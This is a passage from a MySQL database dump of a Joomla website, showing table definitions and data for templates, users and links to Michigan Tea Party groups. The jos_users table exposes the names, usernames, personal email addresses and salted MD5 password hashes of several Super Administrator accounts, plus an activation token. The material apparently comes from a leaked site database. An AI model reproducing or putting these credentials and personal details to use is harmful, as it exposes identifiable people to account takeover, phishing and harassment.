/*!40000 ALTER TABLE `jos_stats_agents` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_templates_menu`
--

DROP TABLE IF EXISTS `jos_templates_menu`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_templates_menu` (
  `template` varchar(255) NOT NULL DEFAULT '',
  `menuid` int(11) NOT NULL DEFAULT '0',
  `client_id` tinyint(4) NOT NULL DEFAULT '0',
  PRIMARY KEY (`menuid`,`client_id`,`template`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_templates_menu`
--

LOCK TABLES `jos_templates_menu` WRITE;
/*!40000 ALTER TABLE `jos_templates_menu` DISABLE KEYS */;
INSERT INTO `jos_templates_menu` VALUES ('jsn_epic_pro',0,0),('khepri',0,1);
/*!40000 ALTER TABLE `jos_templates_menu` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_users`
--

DROP TABLE IF EXISTS `jos_users`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_users` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `name` varchar(255) NOT NULL DEFAULT '',
  `username` varchar(150) NOT NULL DEFAULT '',
  `email` varchar(100) NOT NULL DEFAULT '',
  `password` varchar(100) NOT NULL DEFAULT '',
  `usertype` varchar(25) NOT NULL DEFAULT '',
  `block` tinyint(4) NOT NULL DEFAULT '0',
  `sendEmail` tinyint(4) DEFAULT '0',
  `gid` tinyint(3) unsigned NOT NULL DEFAULT '1',
  `registerDate` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `lastvisitDate` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `activation` varchar(100) NOT NULL DEFAULT '',
  `params` text NOT NULL,
  PRIMARY KEY (`id`),
  KEY `usertype` (`usertype`),
  KEY `idx_name` (`name`),
  KEY `gid_block` (`gid`,`block`),
  KEY `username` (`username`),
  KEY `email` (`email`)
) ENGINE=MyISAM AUTO_INCREMENT=67 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_users`
--

LOCK TABLES `jos_users` WRITE;
/*!40000 ALTER TABLE `jos_users` DISABLE KEYS */;
INSERT INTO `jos_users` VALUES (62,'Donna Nakagiri','rtgadmin','nsadmin@nsconstruct.com','bf2b53db7558146fbf23a0c590eb631e:QmYozsftQlpkdS3JHwLPQeBlphEcKnY9','Super Administrator',0,1,25,'2010-06-06 12:33:39','2010-06-18 22:26:48','','admin_language=\nlanguage=\neditor=\nhelpsite=\ntimezone=0\n\n'),(63,'Jack B','eagle888','jhbrake@comcast.net','dda47657758c81eb02f6312ca729b94f:Zq8Z4KKrDa97r9SHFgZ2QvId9gPyNKqw','Super Administrator',0,1,25,'2010-06-09 03:06:34','2010-06-22 14:13:08','','admin_language=en-GB\nlanguage=en-GB\neditor=tinymce\nhelpsite=http://help.joomla.org\ntimezone=-5\n\n'),(64,'Wes Nakagiri','wes','Wes@RetakeOurGov.com','d4095b9b5415f35b2a4c706156059491:KsRR5HcUUylTUzDxyTy2QsroaPdGuJKH','Super Administrator',0,1,25,'2010-06-09 19:48:20','2010-06-22 18:46:16','','admin_language=\nlanguage=\neditor=\nhelpsite=\ntimezone=0\n\n'),(65,'test','test','test@test.com','89089da95ece6c432ecf11a3d31adb7b:oReGjm2k4mq5nmUaAWmanFQOTzHywtcr','Registered',1,0,18,'2010-06-13 02:31:07','0000-00-00 00:00:00','fb03e3d0689583e03a245a89c705b1bd','\n');
/*!40000 ALTER TABLE `jos_users` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_weblinks`
--

DROP TABLE IF EXISTS `jos_weblinks`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_weblinks` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `catid` int(11) NOT NULL DEFAULT '0',
  `sid` int(11) NOT NULL DEFAULT '0',
  `title` varchar(250) NOT NULL DEFAULT '',
  `alias` varchar(255) NOT NULL DEFAULT '',
  `url` varchar(250) NOT NULL DEFAULT '',
  `description` text NOT NULL,
  `date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `hits` int(11) NOT NULL DEFAULT '0',
  `published` tinyint(1) NOT NULL DEFAULT '0',
  `checked_out` int(11) NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `ordering` int(11) NOT NULL DEFAULT '0',
  `archived` tinyint(1) NOT NULL DEFAULT '0',
  `approved` tinyint(1) NOT NULL DEFAULT '1',
  `params` text NOT NULL,
  PRIMARY KEY (`id`),
  KEY `catid` (`catid`,`published`,`archived`)
) ENGINE=MyISAM AUTO_INCREMENT=18 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_weblinks`
--

LOCK TABLES `jos_weblinks` WRITE;
/*!40000 ALTER TABLE `jos_weblinks` DISABLE KEYS */;
INSERT INTO `jos_weblinks` VALUES (1,2,0,'Joomla!','joomla','http://www.joomla.org','Home of Joomla!','2005-02-14 15:19:02',3,0,0,'0000-00-00 00:00:00',1,0,1,'target=0'),(2,2,0,'php.net','php','http://www.php.net','The language that Joomla! is developed in','2004-07-07 11:33:24',6,0,0,'0000-00-00 00:00:00',3,0,1,''),(3,2,0,'MySQL','mysql','http://www.mysql.com','The database that Joomla! uses','2004-07-07 10:18:31',1,0,0,'0000-00-00 00:00:00',5,0,1,''),(4,2,0,'OpenSourceMatters','opensourcematters','http://www.opensourcematters.org','Home of OSM','2005-02-14 15:19:02',11,0,0,'0000-00-00 00:00:00',2,0,1,'target=0'),(5,2,0,'Joomla! - Forums','joomla-forums','http://forum.joomla.org','Joomla! Forums','2005-02-14 15:19:02',4,0,0,'0000-00-00 00:00:00',4,0,1,'target=0'),(6,2,0,'Ohloh Tracking of Joomla!','ohloh-tracking-of-joomla','http://www.ohloh.net/projects/20','Objective reports from Ohloh about Joomla\'s development activity. Joomla! has some star developers with serious kudos.','2007-07-19 09:28:31',1,0,0,'0000-00-00 00:00:00',6,0,1,'target=0\n\n'),(7,21,0,'Michigan Activists Calendar','michigan-activists-calendar','http://www.michiganactivists.com/','Calendar of TEA Party events and meetings throughout Michigan','2010-06-13 03:21:25',8,1,0,'0000-00-00 00:00:00',1,0,1,'target=1\n\n'),(8,18,0,'Lapeer County Tea Party Patriots - Lapeer','lapeer-county-tea-party-patriots','http://www.lapeerteaparty.org/','','2010-06-09 20:54:39',1,1,0,'0000-00-00 00:00:00',2,0,1,'target=\n\n'),(9,18,0,'SouthEast Michigan 9/12 Project - Royal Oak','southeast-michigan-912-project-royal-oak','http://www.semichigan912.org/','','2010-06-09 20:54:19',0,1,0,'0000-00-00 00:00:00',3,0,1,'target=\n\n'),(10,18,0,'Metro Detroit Feedom Coalition - St Clair Shores','metro-detroit-feedom-coalition-st-clair-shores','http://www.medefco.org/index.html','','2010-06-09 20:56:04',0,1,0,'0000-00-00 00:00:00',4,0,1,'target=\n\n'),(11,18,0,'Brighton Tea Party - Brighton','brighton-tea-party-brighton','http://brightonteaparty.ning.com/','','2010-06-09 20:56:44',1,1,62,'2010-06-13 20:48:50',6,0,1,'target=\n\n'),(12,18,0,'Genesee Tea Party - Flint','genesee-tea-party-flint','http://www.geneseeteaparty.org/','','2010-06-09 20:57:51',0,1,0,'0000-00-00 00:00:00',5,0,1,'target=\n\n'),(13,18,0,'Let Freedom Reign - White Lake','let-freedom-reign-white-lake','http://letfreedomreignusa.ning.com/','','2010-06-09 20:59:05',1,1,0,'0000-00-00 00:00:00',7,0,1,'target=\n\n'),(14,18,0,'Tea Party Patriots','tea-party-patriots','http://www.teapartypatriots.org/state/Michigan','','2010-06-09 20:59:50',0,1,0,'0000-00-00 00:00:00',8,0,1,'target=\n\n'),(15,18,0,'Michigan Liberty Activists Coalition Map','michigan-liberty-activists-coalition-map','http://maps.google.com/maps/ms?ie=UTF8&hl=en&msa=0&msid=112797076086884375724.00047b52de838c4c73d05&z=6','Map of Liberty Groups Throughout Michigan','2010-06-13 03:22:45',1,1,0,'0000-00-00 00:00:00',0,0,1,'target=1\n\n'),(16,18,0,'Fenton Political Action Blog','fenton-political-action-blog','http://fentonpoliticalaction.wordpress.com/','','2010-06-09 21:01:43',0,1,0,'0000-00-00 00:00:00',10,0,1,'target=\n\n'),(17,18,0,'Troy Area TEA Party','troy-area-tea-party','http://troyareateaparty.org/','','2010-06-13 20:51:21',0,1,0,'0000-00-00 00:00:00',12,0,1,'target=\n\n');
/*!40000 ALTER TABLE `jos_weblinks` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Dumping events for database 'nsadmin_jo151'
--

--
-- Dumping routines for database 'nsadmin_jo151'
--
/*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */;

/*!40101 SET SQL_MODE=@OLD_SQL_MODE */;
/*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */;
/*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
/*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */;

-- Dump completed on 2026-05-10 13:57:03
